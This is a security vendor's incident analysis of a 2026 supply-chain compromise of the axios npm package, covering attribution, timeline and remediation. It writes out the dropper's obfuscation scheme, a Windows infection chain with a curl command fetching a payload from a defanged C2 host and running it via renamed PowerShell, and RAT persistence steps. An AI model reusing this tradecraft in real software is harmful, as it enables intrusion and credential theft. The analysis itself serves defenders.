Home Blog Supply Chain Compromise of axios npm Package Last Updated: March 31, 2026 Supply Chain Compromise of axios npm Package By: John Hammond Note: This Rapid Response article has been written with AI assistance. Acknowledgments: Special thanks to Jevon Ang, Michael Elford, Jordan Sexton, Armelle French, Stephanie Fairless, Juzzy Allen, Ryan Dowd, Chad Hudson, Lindon Wass, James Maclachlan, James Northey, Josh Kiriakoff, Jai Minton, and Max Rogers for their contributions to this investigation and response. UPDATE @ 3/31 at 6:30pm ET Since publishing our analysis last night, Huntress has continued to monitor the axios supply chain compromise. The Huntress SOC has seen further indicators on systems, including a system.bat script with a user-run key on a system called Microsoft Update , similar to the one seen in the axios compromise, which instead contacts calltan[.]com . This happens to pre-date the axios compromise, and the exact date of creation is unknown, but it shares a similar theme to another domain linked to this compromise callnrwise[.]com . Notably, the calltan[.]com domain has been linked back to a binary recently used by DPRK actors by researchers at Volexity. While the exact motivation behind the attack remains unclear, multiple lines of evidence now point to North Korean state-sponsored activity. Other researchers, including ones at Elastic , have noted that the macOS binary delivered by the plain-crypto-js post-install hook has overlaps with a backdoor attributed to a DPRK-linked threat cluster. Additionally, the internal project name macWebT links directly to BlueNoroff's documented webT module from RustBucket malware campaigns . Google Threat Intelligence Group has also attributed the attack to UNC1069, a suspected North Korean threat actor. With the malicious packages now removed from the npm registry and the C2 infrastructure offline, we do not expect to see new initial exploitation or follow-on post-exploitation activity from the specific addresses identified in this campaign. However, any system that executed the malicious payload during the exposure window should still be treated as fully compromised. Organizations must continue to follow the remediation guidance outlined below, including rotating all credentials and rebuilding affected systems, as the RAT's capabilities for credential theft and data exfiltration mean the full scope of compromise may not be immediately apparent. -------------------------- ORIGINAL POST TL;DR: Huntress has observed active exploitation of a supply chain compromise targeting the axios npm package -- one of the most widely used JavaScript libraries, with over 100 million weekly downloads. The attack delivered a cross-platform Remote Access Trojan (RAT) to macOS, Windows, and Linux systems via a malicious dependency injected into backdoored axios releases. Organizations should immediately audit their dependencies for axios@1.14.1 or axios@0.30.4 , treat any system that installed either version as compromised, and follow the remediation guidance below. Background On March 31, 2026, a coordinated supply chain attack was executed against the axios npm package. An attacker compromised the npm credentials of the lead maintainer account ( jasonsaayman ) and manually published two backdoored releases: axios@1.14.1 (tagged latest ) and axios@0.30.4 (tagged legacy ). These versions introduced a phantom dependency -- plain-crypto-js@4.2.1 ... a package that had not existed before that day and is never actually imported by axios code. Its sole purpose was to execute a postinstall script that drops and runs a cross-platform RAT targeting macOS, Windows, and Linux. axios is a promise-based HTTP client used extensively across the JavaScript and Node.js ecosystem. It is a transitive dependency for countless packages, CI/CD pipelines, developer workstations, and production applications worldwide. The scope of this compromise is significant: any environment that ran npm install and resolved to axios@1.14.1 or axios@0.30.4 during the approximately three-hour exposure window may have executed the malicious payload automatically with no user interaction required. The malicious versions were published during overnight hours (just after midnight UTC, Sunday night into Monday morning), maximizing the time before maintainers and the npm security team could respond. The compromised packages were removed from npm approximately three hours later, but the damage was already done. Within our partner base, Huntress observed at least 135 endpoints across all operating systems contacting the attacker's command-and-control infrastructure during the exposure window. What happened Account compromise An attacker gained access to the jasonsaayman npm account -- the primary maintainer of the open-source axios library. The maintainer email was changed from the legitimate address to ifstap@proton[.]me , and the attacker bypassed the normal GitHub Actions OIDC-based CI/CD publishing workflow by publishing directly via the npm CLI using a long-lived access token. One critical detail: even on the v1.x branch where OIDC Trusted Publishing was configured, the publish workflow still passed NPM_TOKEN as an environment variable alongside OIDC credentials. When both are present, npm uses the token. This meant the long-lived token was effectively the authentication method for all publishes, regardless of OIDC configuration. The real maintainer later stated in GitHub issue #10604 : "im trying to get support to understand how this even happened. i have 2fa / mfa on practically everything." The exact method of token compromise remains undetermined. Pre-staging The attack was pre-staged approximately 18 hours before detonation. A clean version of plain-crypto-js@4.2.0 was published by an attacker-created account ( nrwise@proton[.]me ) to establish a publishing history on npm. This reduced the likelihood that automated scanners would flag the subsequent malicious version purely on account novelty. Detonation timeline Timestamp (UTC) Event 2026-03-30 23:59:12 plain-crypto-js@4.2.1 published — malicious postinstall payload introduced 2026-03-31 00:05:41 Socket automated detection flags plain-crypto-js@4.2.1 as malware (~6 min after publish) 2026-03-31 00:21:58 axios@1.14.1 published and tagged latest — the attack goes live 2026-03-31 00:23:27 First Huntress-observed infection — macOS endpoint executes RAT, 89 seconds after publish 2026-03-31 00:58:05 First Huntress-observed Windows infection via wt.exe 2026-03-31 01:00:57 axios@0.30.4 published and tagged legacy — second branch targeted ~2026-03-31 03:29 plain-crypto-js removed from npm by npm security team ~2026-03-31 03:30 Compromised axios versions removed from npm The first infection on a Huntress-monitored endpoint landed 89 seconds after axios@1.14.1 was published. This is consistent with automated CI/CD pipelines and developer machines using caret ranges ( ^1.x ) without locked dependencies — the malicious version resolved immediately on the next npm install . Technical details The dropper: setup.js When plain-crypto-js@4.2.1 was installed as a dependency of the backdoored axios, its postinstall hook executed node setup.js . This 4,209-byte JavaScript file used a two-layer obfuscation scheme: Reversed Base64: Encoded strings were reversed, underscores replaced with = padding, then base64-decoded XOR cipher: Key "OrDeR_7077" — alphabetic characters produce NaN in Number(), becoming 0 in bitwise operations, yielding effective key digits [0,0,0,0,0,0,7,0,7,7] All 18 obfuscated strings in the stq[] array hide module names ( child_process , os , fs ), the C2 URL, shell commands, and file paths. On execution, setup.js detects the operating system via os.platform() and launches a platform-specific payload: macOS ( darwin ): Writes an AppleScript to a temp file, which downloads the RAT binary via curl Windows ( win32 ): Writes a VBScript that copies powershell.exe to %PROGRAMDATA%\wt.exe , then downloads and executes a PowerShell RAT Linux: Downloads a Python RAT script to /tmp/ld.py and executes it After payload delivery, setup.js performs three anti-forensics operations: Deletes itself ( setup.js ) Deletes package.json (which contains the postinstall hook…the evidence) Renames package.md to package.json — replacing the manifest with a clean v4.2.0 stub Post-cleanup, the node_modules/plain-crypto-js/ directory appears to be a normal crypto library. The presence of this directory is itself evidence of compromise, even if the contents appear clean. Loading Gist... Windows tradecraft The Windows infection chain proceeds through multiple stages designed to evade detection: node setup.js → Writes VBScript to %TEMP%\6202033.vbs (hidden window, style 0) → Copies powershell.exe to %PROGRAMDATA%\wt.exe → cmd.exe /c curl -s -X POST -d "packages.npm.org/product1" "http://sfrclak[.]com:8000/6202033" > %TEMP%\6202033.ps1 → %PROGRAMDATA%\wt.exe -w hidden -ep bypass -file %TEMP%\6202033.ps1 → Deletes 6202033.ps1 → Deletes 6202033.vbs Figure 1: The Huntress EDR detecting the execution of this attack chain The renamed powershell.exe → wt.exe is a deliberate EDR evasion technique. wt.exe is the legitimate filename for Windows Terminal, so process-name based heuristics may not flag it. The VBScript and PowerShell stages both self-delete after execution. Stage 2: PowerShell RAT The second-stage payload is a full-featured PowerShell RAT that was captured by Huntress SOC analysts while the C2 was still serving payloads. On first execution, it establishes persistence: Creates %PROGRAMDATA%\system.bat with a download cradle that re-fetches the RAT from C2 on every login Sets the system.bat file attribute to Hidden Adds a registry Run key at HKCU:\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftUpdate pointing to the batch file The RAT then performs initial reconnaissance, enumerating the user's Documents , Desktop , OneDrive , AppData\Roaming , and all filesystem drive roots. It